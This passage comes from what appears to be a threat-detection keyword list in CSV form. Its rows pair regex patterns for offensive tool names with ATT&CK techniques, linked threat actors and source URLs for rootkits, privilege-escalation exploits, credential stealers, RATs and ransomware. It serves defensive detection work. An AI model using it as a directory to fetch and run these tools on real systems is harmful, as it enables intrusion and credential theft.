Select a number: *",".{0,1000}\>\>\sWhere\sto\shide\sthe\spayload\?\sSelect\sa\snumber\:\s.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking - persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","#linux #content","N/A","10","10","1838","232","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z","20311" "*>1047@exploit.im<*",".{0,1000}\>1047\@exploit\.im\<.{0,1000}","offensive_tool_keyword","RDP Recognizer","could be used to brute force RDP passwords or check for RDP vulnerabilities","T1110 - T1595.002","TA0006","N/A","BianLian","Credential Access","https://www.virustotal.com/gui/file/74788c34f3606e482ad28752c14550dc469bb0c04fa72e184a1e457613c2e4f6/details","1","0","#productname","N/A","9","10","N/A","N/A","N/A","N/A","20312" "*>ADCSPwn<*",".{0,1000}\>ADCSPwn\<.{0,1000}","offensive_tool_keyword","ADCSPwn","A tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service","T1550.002 - T1078.003 - T1110.003 - T1649","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bats3c/ADCSPwn","1","0","N/A","N/A","10","9","838","127","2023-03-20T20:30:40Z","2021-07-30T15:04:41Z","20316" "*>ADCSPwn<*",".{0,1000}\>ADCSPwn\<.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#productname","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","20317" 
"*>ADFSDump<*",".{0,1000}\>ADFSDump\<.{0,1000}","offensive_tool_keyword","ADFSDump","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#productname","ADFSDump","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","20319" "*>ADFSDump<*",".{0,1000}\>ADFSDump\<.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#productname","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","20320" "*>ADFSDump<*",".{0,1000}\>ADFSDump\<.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#productname","ADFSDump","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","20321" "*>ADPassHunt<*",".{0,1000}\>ADPassHunt\<.{0,1000}","offensive_tool_keyword","ADPassHunt","credential stealer tool that hunts Active Directory credentials (leaked tool Developed In-house for Fireeyes Red Team)","T1003.003 - T1552.006","TA0006 - TA0007","N/A","N/A","Credential 
Access","https://www.virustotal.com/gui/file/73233ca7230fb5848e220723caa06d795a14c0f1f42c6a59482e812bfb8c217f","1","0","#productname","N/A","10","10","N/A","N/A","N/A","N/A","20322" "*>ADSyncDecrypt<*",".{0,1000}\>ADSyncDecrypt\<.{0,1000}","offensive_tool_keyword","ADSyncDecrypt","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#productname","ADSyncDecrypt","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","20323" "*>ADSyncDecrypt<*",".{0,1000}\>ADSyncDecrypt\<.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#productname","ADSyncDecrypt","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","20324" "*>BadPotato<*",".{0,1000}\>BadPotato\<.{0,1000}","offensive_tool_keyword","BadPotato","Windows Privilege Escalation Exploit BadPotato","T1134.001 - T1068 - T1055 - T1546.015","TA0004 - TA0006 - TA0011","Ghost Ransomware","Earth Lusca","Privilege Escalation","https://github.com/BeichenDream/BadPotato","1","0","#productname","N/A","10","9","836","136","2020-05-10T15:42:21Z","2020-05-10T10:01:20Z","20340" "*>BetterSafetyKatz<*",".{0,1000}\>BetterSafetyKatz\<.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - 
T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#productname","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","20346" "*>Blackshades NET<*",".{0,1000}\>Blackshades\sNET\<.{0,1000}","offensive_tool_keyword","BlackShades","remote access trojan (RAT) used by attackers to gain unauthorized control over a victim's computer","T1012 - T1059.001 - T1071.001 - T1105 - T1113 - T1125","TA0003 - TA0005 - TA0008 - TA0010 - TA0011","N/A","N/A","Malware","https://github.com/yuankong666/Ultimate-RAT-Collection/tree/main/BlackShades","1","0","N/A","N/A","10","10","2468","431","2025-04-15T16:14:10Z","2023-09-12T00:41:11Z","20347" "*>blocketw<*",".{0,1000}\>blocketw\<.{0,1000}","offensive_tool_keyword","BlockEtw",".Net Assembly to block ETW telemetry in current process","T1055.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/Soledge/BlockEtw","1","0","#productname","N/A","10","1","78","19","2020-05-14T19:24:49Z","2020-05-14T02:40:50Z","20348" "*>BrowserDataGrabber<*",".{0,1000}\>BrowserDataGrabber\<.{0,1000}","offensive_tool_keyword","Browser Data Grabber","credential access tool used by the Dispossessor ransomware group","T1003 - T1555 - T1081 - T1552","TA0006","N/A","Dispossessor","Credential Access","https://github.com/n37sn4k3/BrowserDataGrabber","1","0","#productname","N/A","10","1","7","4","2018-05-28T15:49:03Z","2018-05-04T12:33:32Z","20351" "*>BrowserGhost<*",".{0,1000}\>BrowserGhost\<.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - 
T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#productname","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","20352" "*>BrowsingHistoryView<*",".{0,1000}\>BrowsingHistoryView\<.{0,1000}","offensive_tool_keyword","BrowsingHistoryView","BrowsingHistoryView is a utility that reads the history data of different Web browsers","T1217 - T1070 - T1113","TA0009 - TA0005 - TA0007","N/A","GOBLIN PANDA","Discovery","https://www.nirsoft.net/utils/browsing_history_view.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","20353" "*>BulletsPassView<*",".{0,1000}\>BulletsPassView\<.{0,1000}","offensive_tool_keyword","bulletpassview","BulletsPassView is a password recovery tool that reveals the passwords stored behind the bullets in the standard password text-box of Windows operating system and Internet Explorer Web browser. After revealing the passwords. 
you can easily copy them to the clipboard or save them into text/html/csv/xml file.","T1040 - T1003 - T1078 - T1518 - T1555","TA0006 - TA0009","N/A","GoGoogle","Credential Access","https://www.nirsoft.net/utils/bullets_password_view.html","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","20354" "*>BypassAddUser<*",".{0,1000}\>BypassAddUser\<.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#productname","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","20355" "*>C3WebController<*",".{0,1000}\>C3WebController\<.{0,1000}","offensive_tool_keyword","C3","Framework designed for red teams to create and manage custom C2 (Command and Control) channels. Unlike traditional C2 frameworks that rely on typical communication methods like HTTP/S DNS or TCP - C3 allows for the creation of non-traditional and esoteric C2 channels using platforms like Slack Dropbox GitHub OneDrive and more.","T1071 - T1102 - T1090 - T1573 - T1048","TA0011 - TA0002 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/WithSecureLabs/C3","1","0","#productname","N/A","9","10","1602","276","2023-03-04T20:32:13Z","2019-08-30T11:21:04Z","20356" "*>ChromePass<*",".{0,1000}\>ChromePass\<.{0,1000}","offensive_tool_keyword","chromepass","ChromePass is a small password recovery tool for Windows that allows you to view the user names and passwords stored by Google Chrome Web browser. For each password entry. 
the following information is displayed: Origin URL. Action URL. User Name Field. Password Field. User Name. Password. and Created Time. It allows you to get the passwords from your current running system. or from a user profile stored on external drive.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","GoGoogle - GOBLIN PANDA - Loki","Credential Access","https://www.nirsoft.net/utils/chromepass.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","20357" "*>Copyright * NYAN CAT 2018<*",".{0,1000}\>Copyright\s.{0,1000}\sNYAN\sCAT\s2018\<.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","N/A","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","20358" "*>CreateAssignTokenVariant<*",".{0,1000}\>CreateAssignTokenVariant\<.{0,1000}","offensive_tool_keyword","PrivFu","get SYSTEM integrity level by abusing arbitrary kernel write vulnerability and token privileges","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","N/A","KernelWritePoCs","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","20359" "*>CreateImpersonateTokenVariant<*",".{0,1000}\>CreateImpersonateTokenVariant\<.{0,1000}","offensive_tool_keyword","PrivFu","get SYSTEM integrity level by abusing arbitrary kernel write vulnerability and 
token privileges","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","N/A","KernelWritePoCs","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","20360" "*>csexec<*",".{0,1000}\>csexec\<.{0,1000}","offensive_tool_keyword","csexec","An implementation of PSExec in C#","T1021.002 - T1059.004 - T1077","TA0008 - TA0009 - TA0011","N/A","N/A","Lateral Movement","https://github.com/malcomvetter/CSExec","1","0","#companyname","N/A","10","4","325","62","2020-12-01T14:52:01Z","2018-08-08T21:09:07Z","20361" "*>csexecsvc<*",".{0,1000}\>csexecsvc\<.{0,1000}","offensive_tool_keyword","csexec","An implementation of PSExec in C#","T1021.002 - T1059.004 - T1077","TA0008 - TA0009 - TA0011","N/A","N/A","Lateral Movement","https://github.com/malcomvetter/CSExec","1","0","#servicename","N/A","10","4","325","62","2020-12-01T14:52:01Z","2018-08-08T21:09:07Z","20362" "*>CursorSvc<*",".{0,1000}\>CursorSvc\<.{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","0","N/A","N/A","10","","N/A","","","","20363" "*>dControl v2.1<*",".{0,1000}\>dControl\sv2\.1\<.{0,1000}","offensive_tool_keyword","defender-control","disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense 
Evasion","https://www.sordum.org/9480/defender-control-v2-1/","1","0","#description","N/A","10","10","N/A","N/A","N/A","N/A","20367" "*>DeadPotato<*",".{0,1000}\>DeadPotato\<.{0,1000}","offensive_tool_keyword","DeadPotato","DeadPotato is a windows privilege escalation utility from the Potato family of exploits leveraging the SeImpersonate right to obtain SYSTEM privileges","T1134.001 - T1068 - T1055 - T1546.015","TA0004 - TA0006 - TA0011","N/A","N/A","Privilege Escalation","https://github.com/lypd0/DeadPotato","1","0","N/A","N/A","10","4","382","45","2024-08-17T06:08:29Z","2024-07-31T01:08:30Z","20368" "*>DebugInjectionVariant<*",".{0,1000}\>DebugInjectionVariant\<.{0,1000}","offensive_tool_keyword","PrivFu","get SYSTEM integrity level by abusing arbitrary kernel write vulnerability and token privileges","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","N/A","KernelWritePoCs","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","20369" "*>DebugUpdateProcVariant<*",".{0,1000}\>DebugUpdateProcVariant\<.{0,1000}","offensive_tool_keyword","PrivFu","get SYSTEM integrity level by abusing arbitrary kernel write vulnerability and token privileges","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","N/A","KernelWritePoCs","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","20370" "*>DecryptAutoLogon<*",".{0,1000}\>DecryptAutoLogon\<.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 
- TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#productname","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","20371" "*>DecryptAutoLogon<*",".{0,1000}\>DecryptAutoLogon\<.{0,1000}","offensive_tool_keyword","DecryptAutoLogon","Command line tool to extract/decrypt the password that was stored in the LSA by SysInternals AutoLogon","T1003.001 - T1555.003 - T1003.006","TA0006","N/A","N/A","Credential Access","https://github.com/securesean/DecryptAutoLogon","1","0","#productname","N/A","10","3","218","32","2020-12-05T16:14:28Z","2020-12-03T20:38:59Z","20372" "*>DecryptTeamViewer<*",".{0,1000}\>DecryptTeamViewer\<.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#productname","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","20373" "*>defender-control<*",".{0,1000}\>defender\-control\<.{0,1000}","offensive_tool_keyword","defender-control","An open-source windows defender manager. 
Now you can disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense Evasion","https://github.com/pgkt04/defender-control","1","0","#productname","N/A","10","10","1614","128","2023-09-09T14:57:56Z","2021-05-15T10:09:17Z","20374" "*>Dionach.ShareAudit<*",".{0,1000}\>Dionach\.ShareAudit\<.{0,1000}","offensive_tool_keyword","ShareAudit","A tool for auditing network shares in an Active Directory environment","T1135 - T1005 - T1083 - T1210","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/dionach/ShareAudit","1","0","#productname","N/A","8","1","42","15","2019-04-29T10:07:57Z","2019-02-26T16:00:15Z","20376" "*>DirtyCLR<*",".{0,1000}\>DirtyCLR\<.{0,1000}","offensive_tool_keyword","DirtyCLR","An App Domain Manager Injection DLL PoC","T1055.001 - T1546.016 - T1055.013","TA0005 - TA0004","N/A","Black Basta","Privilege Escalation","https://github.com/ipSlav/DirtyCLR","1","0","N/A","N/A","7","2","170","19","2023-12-14T21:22:12Z","2023-12-11T11:29:36Z","20377" "*>DIT Explorer<*",".{0,1000}\>DIT\sExplorer\<.{0,1000}","offensive_tool_keyword","DitExplorer","Tool for viewing NTDS.dit","T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/trustedsec/DitExplorer","1","0","#productname","N/A","10","2","155","13","2025-03-14T13:02:44Z","2025-02-12T15:54:04Z","20380" "*>Don HO don.h@free.fr<*",".{0,1000}\>Don\sHO\sdon\.h\@free\.fr\<.{0,1000}","offensive_tool_keyword","credhistview","This tool allows you to decrypt the CREDHIST file and view the SHA1 and NTLM hashes of all previous passwords you used on your system","T1003 - T1081 - T1110","TA0006 - TA0009","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/credhist_view.html","1","0","#companyname","N/A","9","9","N/A","N/A","N/A","N/A","20381" "*>EfsPotato<*",".{0,1000}\>EfsPotato\<.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - 
T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#productname","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","20383" "*>EfsPotato<*",".{0,1000}\>EfsPotato\<.{0,1000}","offensive_tool_keyword","PrivFu","ArtsOfGetSystem privesc tools","T1134 - T1134.001 - T1078 - T1059 - T1075","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","N/A","ArtsOfGetSystem","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","20384" "*>Enables users to elevate themselves to administrator-level rights.<*",".{0,1000}\>Enables\susers\sto\selevate\sthemselves\sto\sadministrator\-level\srights\.\<.{0,1000}","offensive_tool_keyword","MakeMeAdmin","Enables users to elevate themselves to administrator-level rights","T1078 - T1059 - T1087","TA0004","N/A","N/A","Privilege Escalation","https://github.com/pseymour/MakeMeAdmin","1","0","N/A","N/A","9","5","430","94","2024-12-22T02:56:23Z","2018-05-29T19:42:58Z","20387" "*>Extracts wireless keys stored by Windows<*",".{0,1000}\>Extracts\swireless\skeys\sstored\sby\sWindows\<.{0,1000}","offensive_tool_keyword","WirelessKeyView","WirelessKeyView recovers all wireless network security keys/passwords (WEP/WPA) stored in your computer ","T1003 - T1083 - T1552","TA0006 ","N/A","GoGoogle","Credential Access","https://www.nirsoft.net/utils/wireless_key.html","1","0","#Description","N/A","7","10","N/A","N/A","N/A","N/A","20391" "*>GMER Driver http://www.gmer.net<*",".{0,1000}\>GMER\sDriver\shttp\:\/\/www\.gmer\.net\<.{0,1000}","offensive_tool_keyword","gmer","rootkit detector abused by 
attackers to disable security software","T1014 - T1562.001","TA0005","N/A","BlackSuit - Royal - PLAY - LockBit - Bassterlord* - Conti - 8BASE - TargetCompany - Hive - Avaddon","Defense Evasion","gmer.net","1","0","#description","N/A","9","10","N/A","N/A","N/A","N/A","20400" "*>GMSAPasswordReader<*",".{0,1000}\>GMSAPasswordReader\<.{0,1000}","offensive_tool_keyword","GMSAPasswordReader","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#productname","GMSAPasswordReader","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","20401" "*>GMSAPasswordReader<*",".{0,1000}\>GMSAPasswordReader\<.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#productname","GMSAPasswordReader","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","20402" "*>GodPotato<*",".{0,1000}\>GodPotato\<.{0,1000}","offensive_tool_keyword","GodPotato","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation 
tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#productname","GodPotato","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","20403" "*>GodPotato<*",".{0,1000}\>GodPotato\<.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#productname","GodPotato","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","20404" "*>grabff<*",".{0,1000}\>grabff\<.{0,1000}","offensive_tool_keyword","GrabChrome","HelloKitty Grabber used by Dispossessor ransomware group","T1003 - T1555 - T1081 - T1552","TA0006","N/A","Dispossessor","Credential Access","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#productname","N/A","10","10","N/A","N/A","N/A","N/A","20406" "*>Group3r<*",".{0,1000}\>Group3r\<.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#companyname","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","20407" "*>hidden_tear_decrypter<*",".{0,1000}\>hidden_tear_decrypter\<.{0,1000}","offensive_tool_keyword","hidden-tear","open source ransomware - many variant in the wild","T1486 - T1059 - T1485 - T1489 - T1070 - T1488","TA0005 - TA0009 - TA0040 - TA0042","N/A","N/A","Ransomware","https://github.com/goliate/hidden-tear","1","0","N/A","N/A","10","8","765","394","2020-07-08T22:34:01Z","2015-08-19T09:06:51Z","20409" 
"*>hidden-tear.exe<*",".{0,1000}\>hidden\-tear\.exe\<.{0,1000}","offensive_tool_keyword","hidden-tear","open source ransomware - many variant in the wild","T1486 - T1059 - T1485 - T1489 - T1070 - T1488","TA0005 - TA0009 - TA0040 - TA0042","N/A","N/A","Ransomware","https://github.com/goliate/hidden-tear","1","0","N/A","N/A","10","8","765","394","2020-07-08T22:34:01Z","2015-08-19T09:06:51Z","20410" "*>hidden-tear<*",".{0,1000}\>hidden\-tear\<.{0,1000}","offensive_tool_keyword","hidden-tear","open source ransomware - many variant in the wild","T1486 - T1059 - T1485 - T1489 - T1070 - T1488","TA0005 - TA0009 - TA0040 - TA0042","N/A","N/A","Ransomware","https://github.com/goliate/hidden-tear","1","0","N/A","N/A","10","8","765","394","2020-07-08T22:34:01Z","2015-08-19T09:06:51Z","20411" "*>IE Pass View<*",".{0,1000}\>IE\sPass\sView\<.{0,1000}","offensive_tool_keyword","IEPassView","IE PassView scans all Internet Explorer passwords in your system and display them on the main window.","T1555 - T1212","TA0006","N/A","BlackSuit - Royal - GoGoogle - XDSpy","Credential Access","https://www.nirsoft.net/utils/internet_explorer_password.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","20412" "*>IE Passwords Viewer<*",".{0,1000}\>IE\sPasswords\sViewer\<.{0,1000}","offensive_tool_keyword","IEPassView","IE PassView scans all Internet Explorer passwords in your system and display them on the main window.","T1555 - T1212","TA0006","N/A","BlackSuit - Royal - GoGoogle - XDSpy","Credential Access","https://www.nirsoft.net/utils/internet_explorer_password.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","20413" "*>Imminent Monitor<*",".{0,1000}\>Imminent\sMonitor\<.{0,1000}","offensive_tool_keyword","Imminent-Monitor","used for malicious activities such as keylogging - screen capture and remote control of infected systems.","T1012 - T1059 - T1105 - T1071 - T1124 - T1041","TA0005 - TA0003 - TA0011 - TA0009","Imminent 
